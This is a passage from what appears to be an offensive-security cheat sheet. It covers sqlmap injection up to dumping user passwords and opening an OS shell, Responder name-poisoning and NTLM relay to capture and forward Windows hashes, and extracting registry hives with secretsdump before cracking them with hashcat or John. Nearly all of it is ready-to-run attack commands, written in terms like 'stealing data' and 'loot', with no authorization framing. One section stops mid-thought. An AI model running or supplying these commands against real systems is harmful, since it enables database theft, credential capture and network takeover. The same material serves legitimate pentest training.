Filter Size	`ffuf -u ... -w ... -fs 1234` (Hide responses that are exactly 1234 bytes – usually error pages).
Fuzz Params	`ffuf -u http://site.com/index.php?FUZZ=test -w param-list.txt` (Finds hidden GET parameters).

Note: DirB is considered “Legacy.” It works (dirb http://target.com), but Gobuster and Ffuf are significantly faster.

4. SQLMap Cheat Sheet

The “Database Takeover” tool. Use this when you suspect a URL parameter is vulnerable to SQL Injection (e.g., id=1' or a search bar).

Phase 1: Verification (Is it vulnerable?)

Before trying to steal data, confirm the specific parameter is actually broken.

Basic URL Check (GET Request) Check if a visible parameter (like id) is injectable.Bashsqlmap -u "http://site.com/view.php?id=1"
The “Pro” Move (Request File) Instead of typing long URLs and cookies manually, capture the request in Burp Suite, save it to a file (e.g., req.txt), and let SQLMap handle the rest. This is essential for POST requests (login forms).Bashsqlmap -r req.txt

Phase 2: The Enumeration Workflow (Stealing Data)

SQLMap works in a specific hierarchy: Database > Tables > Columns > Data.

Step 1: List the Databases Find out what databases exist on the server.

Bash

sqlmap -u "http://site.com/view.php?id=1" --dbs

Step 2: List Tables in a Specific Database Once you see a database name (e.g., site_db), look inside it.

Bash

sqlmap -u "http://site.com/view.php?id=1" -D site_db --tables

Step 3: List Columns in a Specific Table Once you see a table name (e.g., users), see what fields it has.

Bash

sqlmap -u "http://site.com/view.php?id=1" -D site_db -T users --columns

Step 4: Dump the Data (The Jackpot) Extract the actual data (usernames, passwords) from specific columns.

Bash

sqlmap -u "http://site.com/view.php?id=1" -D site_db -T users -C username,password --dump

Phase 3: Advanced & “Nuclear” Options

Use these flags when the basic scan fails or when you want to dominate the server.

Get a System Shell If the database administrator is running as root, you might be able to take over the whole OS.Bashsqlmap -u "http://site.com/view.php?id=1" --os-shell

Automate “Yes” Answers Stop SQLMap from asking you questions every 5 seconds.Bash--batch

Evade Simple Blocks Use a random browser signature so you don’t look like a bot.Bash--random-agent

The “Nuclear” Option (Level & Risk) By default, SQLMap is polite. If you can’t find a bug but you know it’s there, turn up the noise.

🛡️ What is Responder?

Responder, one of the most effective tools for network lateral movement and credential gathering in a Windows environment.

Responder is a LLMNR, NBT-NS, and MDNS poisoner. It is a “Man-in-the-Middle” tool that listens for computers on the network trying to resolve names they can’t find, and then lies to them saying, “Hey, I’m the machine you’re looking for! Send me your credentials.”

The Analogy: The “Lost Tourist”

Imagine a crowded office.

Victim PC yells out: “Does anyone know where the ‘Print-Server-01’ is?”
DNS Server: “Nope, never heard of it.”
Victim PC (getting desperate): “Okay, I’m shouting to the whole room… does anyone know ‘Print-Server-01’?”
Responder (You): “Yes! That’s me. Please send me your username and password hash so I can verify you.”
Victim PC: “Oh, great! Here is my hash.”
Responder: Steals hash. “Thanks.” (Does not actually provide the printer).

Why it works (The Protocol Flaw)

Windows machines use a hierarchy to find things. If DNS fails, they fall back to older, insecure protocols:

LLMNR: Link-Local Multicast Name Resolution
NBT-NS: NetBIOS Name Service

Responder listens for these specific fallback broadcasts and exploits them.

📜 Responder Cheat Sheet

1. Basic Usage (The “Start & Wait” Mode)

This is the standard way to run Responder. It will listen on your interface and capture NTLMv2 hashes from any machine that gets tricked.

Bash

sudo responder -I eth0

-I eth0: Specifies the Interface (Network Card). Replace eth0 with wlan0, tun0, etc.
Default Behavior: Captures HTTP, SMB, MSSQL, FTP, and LDAP authentication attempts.

2. Analysis Mode (The “Stealth” Scan)

Before you start poisoning (attacking), you should see what is happening on the network. This mode only listens and does not reply. It creates a map of the network traffic.

Bash

sudo responder -I eth0 -A

-A: Analyze mode. Useful to see if LLMNR/NBT-NS traffic actually exists before making noise.

3. Targeting Specific Vulnerabilities (DHCP / WPAD)

If simple poisoning isn’t working, you can try to inject a malicious WPAD (Web Proxy Auto-Discovery) entry via DHCP. This forces browsers to authenticate with you.

Bash

sudo responder -I eth0 -w -d

-w: Enable WPAD proxy server.
-d: Enable DHCP injection.

4. Fingerprinting (Identify Windows Versions)

Responder works great as a passive OS fingerprinting tool.

Bash

sudo responder -I eth0 -f

-f: Fingerprint hosts that request resources.

🔓 The “Cracking” Phase

Once Responder captures a hash, it saves it to a log file. You cannot use the hash directly; you must crack it (turn it back into a password) or relay it.

1. Locate the Hash Responder logs are stored here:

Bash

ls /usr/share/responder/logs/

Look for SMB-NTLMv2-SSP-192.168.x.x.txt.

2. Crack with John the Ripper

Bash

john /usr/share/responder/logs/SMB-NTLMv2-SSP-*.txt --wordlist=/usr/share/wordlists/rockyou.txt

3. Crack with Hashcat (Faster)

Mode: 5600 (NetNTLMv2)

Bash

hashcat -m 5600 responder_hashes.txt /usr/share/wordlists/rockyou.txt

⚔️ Advanced: NTLM Relay (Multi-Tool Combo)

Scenario: You don’t want to crack the password. You want to pass the hash to another machine to gain access immediately.

Tools needed: Responder + impacket-ntlmrelayx

Step 1: Edit Responder Config You must turn OFF the SMB and HTTP servers in Responder so ntlmrelayx can use them.

Bash

sudo nano /etc/responder/Responder.conf

Set SMB = Off
Set HTTP = Off

Step 2: Start Responder

Bash

sudo responder -I eth0 -rdw

Step 3: Start NTLM Relay This captures the victim’s connection from Responder and forwards it to the target server.

Bash

# Dump the SAM database (hashes) from the target
impacket-ntlmrelayx -tf targets.txt -smb2support

-tf targets.txt: A list of IPs you want to attack.
-smb2support: Necessary for modern Windows networks.

⚠️ Important Config Files

Config Location:/etc/responder/Responder.conf
- Why edit this? To toggle specific servers (SQL, FTP, SMB) on or off, or to change the default challenge string (1122334455667788) for rainbow table attacks.
Logs Location:/usr/share/responder/logs/
- Why look here? This is where your loot (hashes) lives. Also contains Responder-Session.log which shows all activity.

Summary Workflow

Analyze: sudo responder -I eth0 -A (Is the network chatty?)
Attack: sudo responder -I eth0 -dw (Start poisoning).
Wait: Watch the screen for [SMB] NTLMv2-SSP Client : ...
Crack: Use Hashcat mode 5600 on the captured logs.

LMHash Grab

Crack Windows Login Password – Offline Credential Dumping & Cracking

Phase 1: Extraction (On the Windows Target)

Goal: Export the registry hives that contain the password hashes. You must have Administrator privileges to do this.

Open Command Prompt (cmd.exe) as Administrator.
Create a temporary folder (to keep things clean) and run the following commands:

DOS

mkdir c:\temp
cd c:\temp
reg.exe save hklm\sam sam.save
reg.exe save hklm\system system.save
reg.exe save hklm\security security.save

SAM: Contains the user password hashes.
SYSTEM: Contains the boot key required to decrypt the SAM.
SECURITY: (Optional but recommended) Contains cached domain credentials and LSA secrets.

Troubleshooting: If you get an “Access Denied” error, ensure you are running CMD as Admin. If reg.exe is blocked, you can try using PowerShell: reg save HKLM\SAM sam.save.

Action: Move these .save files to your Kali Linux machine (via USB, SCP, or Python HTTP server).

Phase 2: Parsing (On Kali Linux)

Goal: Extract the NTLM hashes from the registry files using Impacket.

1. Install Impacket

You do not need to download a random GitHub script. Impacket is standard.

Bash

# Update and install standard toolset
sudo apt update && sudo apt install python3-impacket

# OR using pipx (more modern python management)
sudo apt install pipx
pipx ensurepath
pipx install impacket

2. Run Secretsdump

Navigate to the folder where you saved your registry files and run:

Bash

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

3. Format the Output

The tool will dump output that looks like this:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

You need the NTLM Hash (the 4th section).

Copy the full list of hashes.
Save them to a file named hashes.txt.
Note: You can leave the whole line in; Hashcat is smart enough to find the hash, or you can clean it up to just the NTLM part.

Phase 3: Cracking (Using Hashcat)

Goal: Crack the NTLM hashes. The correct mode for Windows NTLM is 1000.

Standard Syntax:

hashcat -m [Mode] -a [AttackType] [HashFile] [Wordlist] [Rules]

Option A: Basic Dictionary Attack

Fastest method using a standard wordlist (like RockYou).

Bash

hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt -O

-m 1000: Windows NTLM.
-a 0: Straight dictionary attack.
-O: Optimized kernel (much faster, but limits password length > 32).

Option B: Dictionary + Rules (The “OneRule” Method)

This applies mutations (adding numbers, reversing, capitalizing) to your wordlist to find complex passwords.

1. Download the Rule (If you don’t have it)

Bash

mkdir rules
wget https://raw.githubusercontent.com/stealthsploit/OneRuleToRuleThemStill/main/OneRuleToRuleThemStill.rule -O rules/OneRule.rule

2. Run the Attack

Your previous syntax was incorrect. The wordlist must explicitly be in the command.

Bash

hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/OneRule.rule -O

Summary Cheat Sheet

Step	Command
1. Save Registry	`reg save hklm\sam sam.save` (Repeat for SYSTEM)
2. Dump Hashes	`impacket-secretsdump -sam sam.save -system system.save LOCAL`
3. Crack (Fast)	`hashcat -m 1000 hashes.txt wordlist.txt -O`
4. Crack (Deep)	`hashcat -m 1000 hashes.txt wordlist.txt -r rules/OneRule.rule -O`

Additional tools:

Burp Suite, Wireshark, Commview, John The Ripper, BloodHound, Nikto, Impacket, CrackMapExec.